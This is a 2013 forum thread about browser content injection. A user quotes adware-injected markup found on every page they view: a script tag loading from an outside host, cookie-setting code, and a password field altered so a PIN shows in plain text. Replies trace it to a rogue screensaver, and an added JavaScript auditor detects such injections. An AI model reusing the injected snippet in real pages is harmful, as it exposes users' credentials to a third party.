
Possible session hijacking?

Last response: in Windows Vista
November 28, 2013 2:47:19 AM

Hello,

I noticed upon viewing the source of some websites that the same code is in the source code of whatever page I'm viewing. I've checked quite a few pages to make sure it's not the website, and it's not. At the top of the page, the following code is displayed:

    <script type="text/javascript" id="2f2a695a6afce2c2d833c706cd677a8e" src="http://d.lqw.me/xuiow/?g=14D55225-3866-41E2-141F-89A0CAC28320&s=8F71DB22-A8DF-4C0D-A26C-2142A9317F6A&z=1385446817"></script>
    <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
    <meta http-equiv="Content-Script-Type" content="text/javascript">
    <script type="text/javascript">
    function getCookie(c_name) { // Local function for getting a cookie value
        if (document.cookie.length > 0) {
            c_start = document.cookie.indexOf(c_name + "=");
            if (c_start!=-1) {
                c_start=c_start + c_name.length + 1;
                c_end=document.cookie.indexOf(";", c_start);

                if (c_end==-1)
                    c_end = document.cookie.length;

                return unescape(document.cookie.substring(c_start,c_end));
            }
        }
        return "";
    }
    function setCookie(c_name, value, expiredays) { // Local function for setting a value of a cookie
        var exdate = new Date();
        exdate.setDate(exdate.getDate()+expiredays);
        document.cookie = c_name + "=" + escape(value) + ((expiredays==null) ? "" : ";expires=" + exdate.toGMTString()) + ";path=/";
    }
    function getHostUri() {
        var loc = document.location;
        return loc.toString();
    }
    setCookie('YPF8827340282Jdskjhfiw_928937459182JAX666', '*MY IP HERE*', 10);
    location.hre = getHostUri();
    </script>


What brought this to my attention is that a site which requires me to put in an encrypted PIN to continue is outputting the PIN in plain text, rather than encrypted. I viewed the source of the page and noticed it's replacing the:

    <input type="password">


as

    <input type="passwod">


I double checked the legitimate file and it's spelled correctly. It also works for my colleagues as well. This isn't just happening on Google Chrome, it's happening on all browsers such as Opera, IE, Chrome, and Firefox.

Things I've attempted to do to troubleshoot the issue:
- System Restore.
- Cleared cookies in Chrome.
- Ran Malwarebytes (detected loads and removed malicious files).
- Ran ComboFix (detected loads and removed malicious files) ~ I was referred to this topic: http://forums.informaction.com/viewtopic.php?f=8&t=1047...).
- Ran SpyBot (detected loads and removed malicious files).
- Ran SUPERAntiSpyware (detected loads and removed malicious files).

At the end of all of this troubleshooting, I'm still left with this problem and it's really confusing me. Hopefully someone here can help me.

Thanks.
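
A check for the symptoms described in this post, as an added example that is not part of the original thread: it scans saved page source for external scripts from hosts the site does not normally load and for `<input>` types that are not valid HTML (an unrecognised type makes the browser fall back to a plain text field, which is why the PIN shows in the clear). The sample HTML, the `example.test` hosts and the function names are constructed for illustration.

```javascript
// Added example: audit saved page source for signs of local content injection.
// Regex-based tag scan; assumes attribute values do not contain ">".
const VALID_INPUT_TYPES = new Set(["button", "checkbox", "color", "date",
  "datetime-local", "email", "file", "hidden", "image", "month", "number",
  "password", "radio", "range", "reset", "search", "submit", "tel", "text",
  "time", "url", "week"]);

// Return the value of one attribute from a raw opening tag, or null.
function attr(tag, name) {
  const re = new RegExp("\\s" + name + "\\s*=\\s*(?:\"([^\"]*)\"|'([^']*)'|([^\\s>]+))", "i");
  const m = re.exec(tag);
  return m ? (m[1] ?? m[2] ?? m[3]) : null;
}

// Resolve a script src (absolute, protocol-relative or relative) to a hostname.
function hostOf(src, pageHost) {
  try { return new URL(src, "http://" + pageHost + "/").hostname.toLowerCase(); }
  catch { return null; }
}

function auditPage(html, pageHost, allowedHosts = []) {
  const allowed = new Set([pageHost, ...allowedHosts].map(h => h.toLowerCase()));
  const docStart = html.search(/<!doctype|<html\b/i);
  const findings = [];
  for (const m of html.matchAll(/<script\b[^>]*>/gi)) {
    const src = attr(m[0], "src");
    if (src === null) continue;                 // inline script, no host to check
    const host = hostOf(src, pageHost);
    if (host === null || !allowed.has(host)) {
      // Markup placed ahead of the site's own doctype is a strong injection sign.
      const beforeDocument = docStart >= 0 && m.index < docStart;
      findings.push({ kind: "unexpected-script-host", host, beforeDocument });
    }
  }
  for (const m of html.matchAll(/<input\b[^>]*>/gi)) {
    const type = attr(m[0], "type");
    if (type !== null && !VALID_INPUT_TYPES.has(type.toLowerCase()))
      findings.push({ kind: "invalid-input-type", type });
  }
  return findings;
}

// Constructed sample: injected tag first, then the site's own markup, corrupted.
const SAMPLE = [
  '<script type="text/javascript" id="0000" src="http://d.lqw.me/xuiow/?g=CONSTRUCTED"></script>',
  '<!DOCTYPE html><html><head><script src="/js/app.js"></script>',
  '<script src="https://cdn.example.test/lib.js"></script></head>',
  '<body><form><input type="text" name="user"><input type="passwod" name="pin"></form></body></html>',
].join("\n");
console.log(auditPage(SAMPLE, "shop.example.test", ["cdn.example.test"]));
```

Running it against the same page saved from an unaffected machine should return an empty list; a difference between the two points at the local machine rather than the website.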


November 28, 2013 3:31:45 AM

UPDATE: Fixed this. Apparently something with "ScorpianSaver" was found in my Program Files and I had to use Unlocker to kill the process. It deleted everything except "Adpeak.exe", which was then deleted by Unlocker upon reboot. I attempted to go to the websites and it was fixed. :)
December 10, 2013 7:26:02 AM

Hi.
The same thing in the html-frames, affecting all browsers, in one machine of a fellow employee.
No other machine seems affected.
All browser extensions removed, AntiVirus found nothing, but it's still there.
And: some of the pages with that "feature" seem to break html code in the middle.
No idea if it's related.

Best solution

December 10, 2013 7:55:38 AM

We just seemed to solve that issue:
the affected computer had a "scorpions" screensaver installed, not detected by any spybot or antivirus.
The user couldn't recall having installed anything like this - and no screen-saving was actually done.
If you find an unknown screensaver in your installed programs: remove it and restart computer.